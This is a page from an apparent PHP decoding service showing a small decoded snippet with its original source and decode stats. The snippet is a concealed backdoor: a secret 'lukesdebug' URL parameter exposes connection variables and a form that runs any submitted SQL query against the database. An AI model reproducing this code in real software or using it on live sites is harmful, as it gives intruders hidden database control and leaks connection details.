Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if(isset($_GET['lukesdebug'])) { if(isset($_POST['debug1'])) { $conn..

Decoded Output download

<?  if(isset($_GET['lukesdebug'])) { 
     
      if(isset($_POST['debug1'])) { 
        $conn->query($_POST['debug1']); echo "Done.<br>"; 
      } 
       
      echo $conn1." | ".$conn2." | ".$conn3." | ".$conn4; echo "<br><form method='POST'><input type='text' placeholder='brick-lukes debug testing' name='debug1'><input type='submit'></form>"; exit; 
     
    } ?>

Did this file decode correctly?

Original Code

if(isset($_GET['lukesdebug'])) {
    
      if(isset($_POST['debug1'])) {
        $conn->query($_POST['debug1']); echo "Done.<br>";
      }
      
      echo $conn1." | ".$conn2." | ".$conn3." | ".$conn4; echo "<br><form method='POST'><input type='text' placeholder='brick-lukes debug testing' name='debug1'><input type='submit'></form>"; exit;
    
    }

Function Calls

None

Variables

None

Stats

MD5 9c4ffd197fe6f921c5ace60d624458cf
Eval Count 0
Decode Time 56 ms